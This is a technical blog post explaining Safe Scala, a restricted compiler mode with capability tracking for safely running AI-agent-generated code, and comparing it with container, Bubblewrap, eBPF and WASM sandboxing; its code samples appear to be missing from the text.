AI agents are powerful: they can execute many day-to-day tasks thanks to their understanding of the surrounding context. That's what sets them apart from ordinary automations.
However, they can also go wrong in various ways. That's why giving an agent free access to your computer, including unrestricted hard drive access, email access, calendar, web browser with logged-in accounts, etc., might not be the best idea.
For many reasons: starting with agent incompetence, where a "photo cleanup" request ends up with all of your photos permanently removed, instead of neatly organized into folders (technically, an empty folder is the ultimate cleanliness). And ending with actively hostile scenarios, where, through prompt injection, your private data is exfiltrated to a third party.
There are several options for restricting the actions an AI agent can perform. Safe Scala provides tools to achieve just that. Let's take a short overview of how Safe Scala works and what the alternatives are.

Level 0: code generation
We'll start with an entirely insecure setup, where an AI agent can do anything. However, we'll depart slightly from the current status quo by giving an agent a wide set of MCP tools.
Instead, we'll "only" allow agents to generate & run code. This model is strictly more powerful: the same tools can still be called from the code (not necessarily through the MCP protocol; the functionalities provided by the MCP tools can instead be given as a set of APIs). However, the results of the tool calls can be processed by the generated code, which is called multiple times, in a loop, etc. This idea is not new; Anthropic wrote about it about half a year ago.
Such code-generation-with-tools can be implemented in many languages: Python, Ruby, Typescript, Scala, pick your favorite. And while powerful, this is also inherently insecure: if the code generated by the agent is not sandboxed in any way, the agent can do anything. Typically, a general-purpose language can run any external commands or call any external APIs. That's not usually what you want.
Level 1: restricting side-effects
To make an AI agent more secure, we might want to restrict the actions that it can take—especially ones that are irreversible and have side effects. This might include deleting a file, replying to an email, scheduling a calendar event, or preventing the agent from reading certain confidential information.
This can be (and is) implemented in a number of ways. One option is to restrict the code that can be executed—e.g., only execute programs that passed some form of verification, such as compilation. In this scenario, some language features may not be available, and the agent can only use a "safe" subset of the APIs. Another option is to run arbitrary code within a sandbox, thereby implementing runtime verification rather than build-time verification. Realistically, to implement defense in depth, you might want to combine both options—they are not mutually exclusive.
Safe Scala implements the first variant: restricting the Scala language, the standard library, and external APIs to a "safe" subset. Once a Safe Scala program passes compilation, it is guaranteed to execute safely.
Safe mode in Scala is currently available only in the nightly compiler builds, and can be enabled with import language.experimental.safe at the top of the source file. Safe Scala has been introduced in the Tracking Capabilities for Safer Agents paper, and also described by Martin Odersky in his Scalar 2026 talk (videos available soon!).
In Safe Scala, you cannot use a number of Scala constructs and APIs, such as:
- no runtime reflection
- no type casts
- no printing to the console
- no file, network, system process operations
Additionally, the code is compiled with explicit null checking, capability tracking, and mutation tracking (more on that later).
For example, this compiles fine in Safe Scala (all examples are runnable using scala-cli):
However, these end up with compiler errors:
As well as this:
Applications written entirely in Safe Scala might be safe, but without the possibility of having any side effects whatsoever, would also be quite useless (you aren't even able to println the result of your program!). That's why we need a mechanism to selectively allow side-effecting code through trusted libraries.
Such trusted libraries need to expose a reviewed, constrained set of side effects. This might be an API for reading and writing to a specific directory, or for performing network calls to a specific service. We might even expose a full HTTP client, however, with a pre-configured interceptor that allows connections only to domains on an allow-list.
Hence, the Safe Scala approach doesn't mean that all security checks are performed at compile-time—some checks can still be delegated to run-time. However, the safe API that we expose already includes those runtime checks.
Code can be marked as trusted using the @assumeSafe annotation. Of course, this annotation cannot be used within a Safe Scala program—otherwise, an agent could just generate @assumeSafe-annotated code, and circumvent our security measures.
Instead, Safe Scala restricts which library code can be called: only libraries compiled in safe mode or annotated with @assumeSafe. We can publish such a library locally, in the environment where agent-generated code runs, or to a shared repository:
Then, we can use the library:
Indeed, after running this code, the result.txt file has the content 55. Note that the agent can never see the result: it has no option (using the library code that we have exposed to the agent) to read any files.
Level 1: Alternative approaches
Describing alternatives in depth would be an article on its own, so we'll just briefly cover two.
First, we already mentioned running arbitrary code in a sandboxed environment. This might, for example, be a Docker container with only some host directories mounted. That way, the code cannot access or modify anything on the host except the specified folders. Also, network connectivity can be constrained, including advanced filtering using a man-in-the-middle proxy.
That's the approach that we took to implement our development setup for dangerously running Claude Code with reasonable security, in the Sandcat project.
In fact, Docker itself now has its own sandbox mode, and there are a number of other projects providing container-based sandboxing.
However, running a container might be fine for a stand-alone long-running agent, but otherwise, it's quite a heavy solution. A lighter-weight option might be using Bubblewrap for Linux (or SeatBelt for MacOS), which can be used to control file visibility, combined with Landlock to control file access. That way, a process can be run with restricted privileges, within the host operating system.
That's also used in the wild: the above tools are what Anthropic uses for its /sandbox in Claude Code. However, that sandbox offers only partial security, as it only covers bash operations (not all tool calls).
Yet another option is to write a custom eBPF program and attach it to a container (or even your host), filtering file and network access for the relevant processes. This can be done by attaching the eBPF program to Linux Security Module hooks.
Finally, an approach similar to what we did so far with Safe Scala can be implemented by compiling, e.g., Rust to WASM, or running TypeScript inside a WASM-sandboxed JavaScript engine. By default, a WASM module cannot perform any I/O. However, the ability to interact with the external world can be added by adding WASI (WebAssembly System Interface) capabilities. How this is done depends on the specific WASM runtime. But we can expose certain directories, or write arbitrary code that filters network access.
It's entirely a run-time check: the WASM module can only use the capabilities that have been specified when launching the interpreter. Or rather, stronger than a check—if the capability isn't exposed, it simply doesn't exist and thus cannot be called.
Fun fact: Scala can also be compiled to WASM!
Level 2: Enter Scala capabilities
Restricting the language constructs and limiting the APIs that a Safe Scala program can call already gives us a lot. But there's more—thanks to capture checking, another experimental Scala 3 feature.
With capture checking, we can mark values through which side effects can be performed as tracked. Anything that captures these values (such as a function) is also tracked, since it can transitively perform side effects.
That alone might give us more compile-time safety, but crucially, we can also require the absence of side effects in certain contexts. That is, we can impose restrictions that, in some contexts, only pure functions—which don't capture any tracked values—can be used. In other contexts, we allow our carefully selected side effects to be performed.
Let's go through an example. The paper introduces a Classified[T] wrapper class, which holds values that should not be exposed to the agent (the LLM). The Classified class is defined in a library and annotated with @assumeSafe. Its definition is:
Note that the function in map uses a "thin arrow": T -> U. This is the type of pure Scala functions: functions that don't capture any tracked values. Conversely, the "fat arrow": T => U is the type of function that can capture anything.
Hence, any transformations of the classified values must be pure; they cannot have any side effects.
To make our code useful, we do want to sometimes print something back to the LLM. Hence, we need a println function, but one that requires a tracked value to be used. That's why we introduce an IO tracked value (which becomes tracked as it extends SharedCapability), and a safePrintln method, which requires this value in the implicit scope; this is all part of our library code:
This code will now compile fine:
But this will fail with a compile-time error:
Of course, creating classified values from literals available in the generated code is just a demonstration—in reality, the agent-generated code would obtain classified values by reading them from a database, the network, or the filesystem. Scala would then statically guarantee that, while pure transformations on these values can be performed, they cannot be leaked to the host LLM.
For example, if we now extend our library with functions such as:
The agent can generate programs that arbitrarily transform classified values without ever being able to see them. We would also probably want to restrict the path to a specific directory, which would be enforced at runtime.
The paper includes a more developed example involving fine-grained filesystem-related capabilities and a two-LLM architecture: one "smarter" LLM for code generation and a local LLM for simpler tasks such as summarization. The local LLM is trusted, and thus doesn't require any tracked capabilities to be called.
Running Safe Scala from an agent
To run agent-generate Safe Scala code, we need to complete two more steps.
First, we need to expose the "compile & run safe-scala code" tool to the agent. This can be done by implementing an MCP server with such a tool exposed. It might be the only MCP server configured in your agent: all other tools should be available as library calls, reachable from the generated code.
Such an MCP server is exactly what's implemented in the tacit proof-of-concept project, which accompanies the Tracking Capabilities for Safer Agents paper. Hence, you might either experiment with Safe Scala directly via nightly & scala-cli, or use an MCP server that allows running generated Scala code in safe mode.
To expand your experiments, you might want to modify the library that's available to the agent. But here comes the second missing piece of the puzzle: we need to let the agent know what the interface of our library is. Currently, this has to be done in text; a separate tool returns the scaladoc for a designated trait in the library, with a full description of the available API, Safe Scala restrictions, etc.
Summing up
Safe Scala is a language mode that guarantees that if the code compiles, it doesn't circumvent the type system in any way, only calls safe library methods, and properly tracks any values through which side effects can be performed. This can be used to safely run agent-generated code.
While WASM or sandboxing allow restricting agent-generated code through run-time checks, Safe Scala enhances this with the possibility of requiring that, in certain contexts, only pure functions (without side effects), or with certain permitted effects, can be used.
When designing an agent system, as with everything, there are tradeoffs. On one hand, agents are powerful because they can read and understand files, emails, web pages, etc. So we can't classify too much: if agents can't access or modify the data, their utility will diminish greatly.
On the other hand, running unrestricted agents has already proved catastrophic in many situations: dropped databases, erased emails, or prolonged system downtime. Hence, Safe Scala might be especially valuable, e.g., in corporate environments, where data privacy is the top concern.
When designing an agent system leveraging Safe Scala, it will be a delicate act of balancing security and utility, coupled with designing a powerful enough, but safe library that the agent can use.




